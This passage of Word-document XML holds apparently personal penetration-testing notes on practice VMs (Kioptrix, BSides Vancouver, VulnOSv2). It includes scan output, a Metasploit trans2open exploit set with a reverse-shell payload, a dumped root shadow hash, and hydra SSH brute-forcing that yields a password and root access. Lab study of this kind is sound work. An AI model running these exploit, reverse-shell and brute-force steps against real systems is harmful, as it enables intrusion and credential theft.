        <w:t>OPTRIX\wheel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S-1-5-21-4157223341-3243572438-1405127623-1022 KIOPTRIX\operator (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1023 KIOPTRIX\unix_group.11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S-1-5-21-4157223341-3243572438-1405127623-1024 KIOPTRIX\games (Loca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>l User)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S-1-5-21-4157223341-3243572438-1405127623-1025 KIOPTRIX\mail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S-1-5-21-4157223341-3243572438-1405127623-1026 KIOPTRIX\gopher (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1027 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KIOPTRIX\news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S-1-5-21-4157223341-3243572438-1405127623-1028 KIOPTRIX\ftp (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1029 KIOPTRIX\uucp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S-1-5-21-4157223341-3243572438-1405127623-1030 KIOPTRIX\unix_user.15 (Local User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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S-1-5-21-4157223341-3243572438-1405127623-1031 KIOPTRIX\man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S-1-5-21-4157223341-3243572438-1405127623-1032 KIOPTRIX\unix_user.16 (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1033 KIOPTRIX\unix_group.16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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>23341-3243572438-1405127623-1034 KIOPTRIX\unix_user.17 (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1035 KIOPTRIX\unix_group.17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S-1-5-21-4157223341-3243572438-1405127623-1036 KIOPTRIX\unix_user.18 (Local User)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>43572438-1405127623-1037 KIOPTRIX\unix_group.18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S-1-5-21-4157223341-3243572438-1405127623-1038 KIOPTRIX\unix_user.19 (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1039 KIOPTRIX\floppy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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>127623-1040 KIOPTRIX\unix_user.20 (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1041 KIOPTRIX\games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S-1-5-21-4157223341-3243572438-1405127623-1042 KIOPTRIX\unix_user.21 (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1043 KIOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TRIX\slocate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S-1-5-21-4157223341-3243572438-1405127623-1044 KIOPTRIX\unix_user.22 (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1045 KIOPTRIX\utmp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S-1-5-21-4157223341-3243572438-1405127623-1046 KIOPTRIX\squid (Local Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r)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S-1-5-21-4157223341-3243572438-1405127623-1047 KIOPTRIX\squid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S-1-5-21-4157223341-3243572438-1405127623-1048 KIOPTRIX\unix_user.24 (Local User)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S-1-5-21-4157223341-3243572438-1405127623-1049 KIOPTRIX\unix_group.24 (Local Group)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>57223341-3243572438-1405127623-1050 KIOPTRIX\unix_user.25 (Local User)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================================( Getting printer info for 192.168.1.4 )================================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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                         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 printers returned.                                                                                      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enum4linux complete on Mon Aug  1 04:53:08 2022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nikto -h </w:t>
      </w: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http://192.168.1.4/</w:t>
        </w:r>
      </w:hyperlink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Nikto v2.1.6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---------------------------------------------------------------------------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Target IP:              192.168.1.4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Target Hostname:        192.168.1.4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Target Port:            80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+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Start Time:             2022-08-01 05:14:12 (GMT-4)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---------------------------------------------------------------------------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Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b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Server may leak inodes via ETags, header found wi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>th file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001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The anti-clickjacking X-Frame-Options header is not present.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The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS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+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type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mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)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Apa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>che/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.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OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.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OSVDB-27487: Apache is v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ulnerable to XSS via the Expect header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Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE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OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST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OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> possible code execution. CAN-2002-0392.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OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.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+ OSVDB-2733: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.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+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. </w:t>
      </w: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http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, OSVDB-756.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///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.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+ OSVDB-682: /usage/: Webalizer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).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OSVDB-3268: /manual/: Directory indexing found.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OSVDB-3092: /manual/: Web server manual found.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OSVDB-3268: /icons/: Directory indexing found.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OSVDB-3233: /icons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/README: Apache default file found.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OSVDB-3092: /test.php: This might be interesting...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/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.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/wordpresswp-content/themes/twentyeleven/imag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>es/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.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/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.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/wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>etc/hosts: A PHP backdoor file manager was found.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/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.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/wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor fil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e manager was found.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/assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.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/login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.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/shell?cat+/etc/hosts: A backdoor was identified.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+ 8724 reque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sts: 0 error(s) and 30 item(s) reported on remote host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End Time:               2022-08-01 05:14:52 (GMT-4) (40 seconds)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---------------------------------------------------------------------------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+ 1 host(s) tested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SMB ENUM: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msf6 &gt; search smb_version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Matching Modules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#  Name                                   Disclosure Date  Rank        Check  Description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 ----                                   ---------------  ----        -----  -----------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0  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auxiliary/scanner/smb/smb_version                   normal  No         SMB Version Detection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Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version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msf6 &gt; use 0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msf6 auxiliary(scanner/smb/smb_versi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on) &gt; set RHOSTS 192.168.1.4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RHOSTS =&gt; 192.168.1.4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msf6 auxiliary(scanner/smb/smb_version) &gt; run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[*] 192.168.1.4:139           - SMB Detected (versions:) (preferred dialect:) (signatures:optional)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[*] 192.168.1.4:139           -   Host could not be ident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ified: Unix (Samba 2.2.1a)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[*] 192.168.1.4:              - Scanned 1 of 1 hosts (100% complete)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[*] Auxiliary module execution completed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smbclient -L </w:t>
      </w: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\\\\192.168.1.4\\</w:t>
        </w:r>
      </w:hyperlink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Server does not support EXTENDED_SECURITY  but '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>client use spnego = yes' and 'client ntlmv2 auth = yes' is set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Anonymous login successful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Password for [WORKGROUP\kali]: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Sharename           Type          Comment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---------           ----          -------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IPC$         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>       IPC           IPC Service (Samba Server)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ADMIN$              IPC           IPC Service (Samba Server)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smbclient </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>\\\\192.168.1.4\\IPC$</w:t>
        </w:r>
      </w:hyperlink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Password for [WORKGROUP\kali]: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Server does not support EXTENDED_SECURITY  but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set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Anonymous login successful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Try "help" to get a list of possible commands.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smb: \&gt; ls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NT_STATUS_NETWORK_ACCESS_DENIED listing \*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Exploit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msf e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>xploit(linux/samba/trans2open) &gt; set RHOST192.168.1.14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msf exploit(linux/samba/trans2open) &gt; set payload linux/x86/shell_reverse_tcp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msf exploit(linux/samba/trans2open) &gt; set lhost 192.168.1.6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msf exploit(linux/samba/trans2open) &gt; exploit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manual expl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>oit: openluck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cat /etc/shadow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root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::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Crack password: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hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://192.168.1.4:22 -t 4 -V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 use ssh_login in msf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BSides Vancouver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Tuesday, August 2, 2022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3:17 AM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nmap -sS 192.168.1.0/24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[sudo] password for kali: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Starting Nmap 7.92 ( </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://nmap.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) at 2022-08-03 05:18 EDT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Nmap scan report for 192.168.1.1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 is up (0.00059s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> latency).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 shown: 999 closed tcp ports (reset)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PORT STATE SERVICE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53/tcp open domain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MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)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Nmap scan report for 192.168.1.2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 is up (0.0034s latency).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 shown: 996 filtered tcp ports (no-response)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PORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> STATE SERVICE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80/tcp open http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135/tcp open msrpc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445/tcp open microsoft-ds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1025/tcp open NFS-or-IIS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MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)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Nmap scan report for 192.168.1.3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 is up (0.00022s latency).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All </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1000 scanned ports on 192.168.1.3 are in ignored states.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 shown: 1000 filtered tcp ports (proto-unreach)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MAC Address: 08:00:27:22:25:53 (Oracle VirtualBox virtual NIC)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Nmap scan report for 192.168.1.12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 is up (0.00042s latency).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 shown: 997 clo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sed tcp ports (reset)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PORT STATE SERVICE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21/tcp open ftp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22/tcp open ssh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80/tcp open http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MAC Address: 08:00:27:F1:E5:AE (Oracle VirtualBox virtual NIC)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Nmap scan report for 192.168.1.6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 is up (0.0000030s latency).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All 1000 scanned ports on 192.168.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.6 are in ignored states.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 shown: 1000 closed tcp ports (reset)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Nmap done: 256 IP addresses (5 hosts up) scanned in 11.71 seconds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???(kali?kali)-[~]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??$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???(kali?kali)-[~]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??$ ftp 192.168.1.12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Connected to 192.168.1.12.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220 (vsFTPd 2.3.5)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Name (192.168.1.12:kali): anonymous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230 Login successful.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Remote system type is UNIX.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binary mode to transfer files.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ftp&gt; ls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229 Entering Extended Passive Mode (|||51753|).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150 Here comes the directory listing.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drwxr-xr-x 2 65534 65534 4096 Mar 03 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>18 public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226 Directory send OK.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ftp&gt; cd public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250 Directory successfully changed.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ftp&gt; ls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229 Entering Extended Passive Mode (|||14397|).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150 Here comes the directory listing.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-rw-r--r-- 1 0 0 31 Mar 03 2018 users.txt.bk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226 Directory send OK.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ftp&gt; get u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sers.txt.bk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local: users.txt.bk remote: users.txt.bk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229 Entering Extended Passive Mode (|||26448|).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150 Opening BINARY mode data connection for users.txt.bk (31 bytes).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100% |***********************************************************************| 31 5.07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> KiB/s 00:00 ETA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226 Transfer complete.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31 bytes received in 00:00 (4.17 KiB/s)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cat users.txt.bk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abatchy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john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mai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anne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doomguy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hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-t 5 -V -f -l anne -P /usr/share/wordlists/rockyou.txt 192.168.1.12 ssh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Hydra v9.3 (c) 2022 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> laws and ethics anyway).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Hydra (</w:t>
      </w:r>
      <w:hyperlink r:id="rId12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https://github.com/vanhauser-thc/thc-hydra</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) starting at 2022-08-03 05:51:25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[DATA] max 5 tasks per 1 server, overall 5 tasks, 14344399 login tries (l:1/p:14344399</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), ~2868880 tries per task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[DATA] attacking ssh://192.168.1.12:22/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[ATTEMPT] target 192.168.1.12 - login "anne" - pass "123456" - 1 of 14344399 [child 0] (0/0)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[ATTEMPT] target 192.168.1.12 - login "anne" - pass "12345" - 2 of 14344399 [child 1] (0/0)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[ATT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EMPT] target 192.168.1.12 - login "anne" - pass "123456789" - 3 of 14344399 [child 2] (0/0)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[ATTEMPT] target 192.168.1.12 - login "anne" - pass "password" - 4 of 14344399 [child 3] (0/0)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[ATTEMPT] target 192.168.1.12 - login "anne" - pass "iloveyou" - 5 of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14344399 [child 4] (0/0)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[ATTEMPT] target 192.168.1.12 - login "anne" - pass "princess" - 6 of 14344399 [child 1] (0/0)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[ATTEMPT] target 192.168.1.12 - login "anne" - pass "1234567" - 7 of 14344399 [child 3] (0/0)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[22][ssh] host: 192.168.1.12 login: anne </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>password: princess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[STATUS] attack finished for 192.168.1.12 (valid pair found)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 of 1 target successfully completed, 1 valid password found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Hydra (</w:t>
      </w:r>
      <w:hyperlink r:id="rId13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https://github.com/vanhauser-thc/thc-hydra</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) finis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hed at 2022-08-03 05:51:39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ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anne@192.168.1.12</w:t>
        </w:r>
      </w:hyperlink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authenticity of host '192.168.1.12 (192.168.1.12)' can't be established.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ECDSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key fingerprint is SHA256:FhT9tr50Ps28yBw38pBWN+YEx5wCU/d8o1Ih22W4fyQ.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key is not known by any other names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Are you sure you want to continue connecting (yes/no/[fingerprint])? yes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Warning: Permanently added '192.168.1.12' (ECDSA) to the list of known </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hosts.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hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>anne@192.168.1.12's password:</w:t>
        </w:r>
      </w:hyperlink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Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)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* Documentation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://help.ubuntu.com/</w:t>
        </w:r>
      </w:hyperlink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382 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>packages can be updated.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275 updates are security updates.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New release '14.04.5 LTS' available.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 'do-release-upgrade' to upgrade to it.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Last login: Sun Mar 4 16:14:55 2018 from 192.168.1.68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anne@bsides2018:~$ whoami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anne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anne@bsides2018:~$ pwd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/home</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/anne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anne@bsides2018:~$ ls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anne@bsides2018:~$ ls -la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total 12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drwxr-xr-x 3 anne anne 4096 Aug 3 02:51 .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drwxr-xr-x 7 root root 4096 Mar 4 2018 ..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drwx------ 2 anne anne 4096 Aug 3 02:51 .cache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anne@bsides2018:~$ sudo su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[sudo] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>password for anne: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root@bsides2018:/home/anne# ls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root@bsides2018:/home/anne# pwd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/home/anne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root@bsides2018:/home/anne# cd /root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root@bsides2018:~# ls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flag.txt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root@bsides2018:~# cat flag.txt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Congratulations!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VulnOSv2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August 4, 2022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9:13 PM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netdiscover -r 192.168.1.0/24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Currently scanning: Finished!   |   Screen View: Unique Hosts                                        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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">      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4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                      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_____________________________________________________________________________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IP            At MAC Address     Count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">     Len  MAC Vendor / Hostname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-----------------------------------------------------------------------------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192.168.1.1     52:54:00:12:35:00      1      60  Unknown vendor                                     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192.168.1.2     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">52:54:00:12:35:00      1      60  Unknown vendor                                     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192.168.1.3     08:00:27:98:be:d4      1      60  PCS Systemtechnik GmbH                             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192.168.1.13    08:00:27:57:4f:aa      1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
